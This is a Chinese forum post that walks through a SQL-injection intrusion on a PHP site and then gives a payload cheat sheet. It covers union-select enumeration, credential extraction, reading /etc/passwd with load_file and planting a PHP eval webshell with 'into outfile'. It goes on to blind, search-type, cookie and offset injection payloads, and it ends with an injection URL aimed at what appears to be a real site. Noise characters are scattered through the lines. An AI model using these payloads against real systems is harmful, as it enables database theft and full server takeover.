我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~! z& M& P" r! f: T2 l
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?+ X& O+ z$ |; t4 ~: z" L
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
" M7 r8 @9 X; x8 F& u; r如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
; X8 Y" J/ _* W6 L }1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
6 _2 m" Q- \ b3 d) B6 n3 V0 k这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:% o2 w+ I' X8 ]( U' _
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
7 |# ^4 ?% U( ^( @1 H3 U: v/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入) ]7 { _) y6 M4 m, o& h
; L4 ^% r! P) b8 O
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
/ r7 {. H2 L+ i# O3 w# Q( u2 e3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意5 ]0 b9 \1 r U) O4 X
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
0 h2 U0 x) k/ v+ Z5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
1 ~. M$ z' W! \+ y有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
$ f0 G- O3 I: s# r; e% P: M4 C1 i2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。 n' [( j( Q( W& H" O
我就用的是第二个思路,
8 Q& W* m L- L( X3 h2 m提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- ) Y, U t1 {2 J! B, F! W! n$ z3 c( `
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
! w; w1 N& F2 d( W" x提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--1 S' C4 D- n2 r4 K
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。2 L& r1 R; P. w
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????/ Y# g4 q' _2 Q- b c0 K; y
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....( r" N1 H- V* i6 T& L
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --/ f, j; h2 ~2 d2 `: H5 @
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
) M6 N' w! P% _' [调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......5 |; `- J: Q% J& R
下面是一些很普遍注入方式资料:7 G8 h! Z- D, p* e2 [
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
; a/ H5 X% ?# w. i拆半法9 ~' A' E9 N M8 M3 O
######################################
' w8 @! G' U" N! D5 N+ c# l3 _and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。, Q B4 m7 f5 x9 M& F8 ~$ E
and exists (select * from admin)% n/ I; T3 o' R3 }
and exists(select id from admin)* z) u/ z8 O2 A3 e3 g& [. H6 o% K/ T1 c
and exists(select id from admin where id=1)" [$ W2 q0 ?" L* Y. M
and exists(select id from admin where id>1) # |; S6 g) k) U) | G4 [, U
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 - S1 P6 f1 Z* {! D* O
and exists (select username from admin)
0 s/ V9 {/ s4 Nand exists (select password from admin) b* \' K% q+ {" o
and exists (select id from admin where len(username)<10 and id=1)
$ c: }) Z) H2 S5 s, ]6 qand exists (select id from admin where len(username)>5 and id=1)! S4 f2 q1 U1 a& h
and exists (select id from admin where len(username)=6 and id=1)5 [% J" ?+ P0 O* E# ]# |" ~
and exists (select id from admin where len(password)<10 and id=1)
8 Z, B3 p0 `3 X8 uand exists (select id from admin where len(password)>5 and id=1)
9 j2 h9 C! V9 {: Sand exists (select id from admin where len(password)=7 and id=1)
# N6 k. Y/ m$ T' L* e' U; Aand (select top 1 asc(mid(username,1,1)) from admin)=97
7 T5 q% R6 T! G返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
7 k; X0 n* x4 T/ C$ z猜第二位把username,1,1改成username,2,1就可以了。
7 d5 S( s0 G8 s猜密码把username改成password就OK了: A' v4 ]: ?; R& J
##################################################6 h; {2 f, M7 f
搜索型注入
, N) M6 C g( U6 E3 I9 k: @8 Y4 t, Q##################################, c$ x+ n+ D( ^! x4 S
%' and 1=1 and '%'='
, F } a$ P2 j%' and exists (select * from admin) and '%'='
5 c, [) W. y( ?%' and exists(select id from admin where id=1) and '%'='7 u- J% `4 L, ~( t* F7 n
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
; g. F* S! C# b- e2 M2 ~%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
$ d7 w, B, W' O4 R7 E# O%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
/ p" @6 y7 l2 f$ D$ |+ R这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='0 a8 r4 g$ G/ ]$ S& x
对于MSSQL数据库,后面可以吧 and '%'='换成--- u n% \" L0 z3 } j4 H6 i* a
还有一点搜索型注入也可以使用union语句。
1 W& h8 G. X s, x. a########################################################
3 e" j m0 D( ]4 Y% r2 B联合查询。
( ^7 d5 i$ d% a* ?/ j9 f/ r#####################################2 [5 H# i% D$ Y5 c) T7 Y# T) w
order by 107 r0 F$ t x, `1 i* a
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
0 |+ c! X! O, r; m$ ~! ^6 D/ I T* _and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin" ], f% h6 t5 r0 L
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1% b1 S# Q' m: R3 l+ z+ j
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
' D" s4 R; |0 I+ n###################################
4 V: a2 j% L ccookie注入
4 V9 Q1 X1 i9 L3 a6 F###############################7 S5 k8 x" F+ E6 g u
http://www.******.com/shownews.asp?id=127) g) M U! q7 T! m; B; C3 F# u' N+ y2 c
http://www.******.com/shownews.asp) \5 e7 V/ ?. L7 n. y
alert(="id="+escape("127"));
m& a j1 c% \; I* H$ W! zalert(="id="+escape("127 and 1=1"));& d6 A5 y- {# m8 D! F, @# C- h/ M
alert(="id="+escape("127 order by 10"));: a9 l* ?- m2 H" T( }" g
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));+ ?" n' W2 a5 l+ ?$ [6 o3 g* u
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
4 G; ]4 L1 n& `- g这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
H6 W0 \5 ^1 h###################################
) {/ E) X- W. t: F+ ~! ]" A偏移注入
) ^, b7 t: W* D, f# o+ |# H###########################################################
$ J0 u. g" w# |. w8 g6 Sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin, \1 u7 C1 n) [: u
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
' l6 v1 C, }$ Cunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id), L) X2 ]$ @3 z. P9 o! F
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)0 e- e) I# P+ K2 j3 w; @8 J
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
@) r! }: |# l7 junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
% G# R7 w$ z% Ounion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on. i1 l5 O" O4 t: j' h
a.id=d.id)
c" s2 z' G% e$ n! Iand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)9 c7 m" f1 P! k# r1 `
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
; O% s# }. L3 t ( i& D: Y" _6 t! ^+ ^0 B/ U
============================================================================================================& _9 A) }1 y# k# T W
1.判断版本
* A% |; H0 [* w4 ?and ord(mid(version(),1,1))>51, Z3 O! k* E! C; t1 w
返回正常,说明大于4.0版本,支持ounion查询* ~) {8 [! R0 c1 N: M
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解" [! n5 _; h& A2 o
and 2=4 union select 1,2,3,4,5,6,7,8,9--
) x0 Q8 g% V J1 \3.查看数据库版本及当前用户,
- U2 q2 B u; W! V# Band 2=4 union select 1,user(),version(),4,5,6,7,8,9--
% ^' l/ E1 C& ]数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,* @" D' e5 f% I6 N3 L2 V
4.判断有没有写权限
, F$ T& ]: q+ L$ \1 l% ]0 Zand (select count(*) from MySQL.user)>0-- . \6 x7 i; w5 M- _1 w
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,19 u c4 v( N. k" k
用不了这个命令,就学习土耳其黑客手法,如下
7 d( M! \1 X0 q+ mand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--1 @1 Q v1 G- k4 z, h+ f3 l
6.爆表,爆库
/ G* ]: f% _8 u$ qand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--/ Q( Q- F) I& J2 m" Z% Z3 y; Q1 G4 C
7.爆列名,爆表2 M8 f* N+ }0 t( U e
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--& n9 V& N5 {3 S5 c/ y
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。$ s7 \# S/ X# t1 J
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--% x# a! W3 C/ h; E' E
9.爆字段内容! D$ j% a) V9 o3 @
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
1 h% _* j/ `6 ^ G5 n0 |: i# S, ^8 l% `& zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |
发表于 2012-9-23 14:47:22
收藏
支持
反对
发表于 2012-9-24 21:40:46
发表于 2012-9-25 18:53:39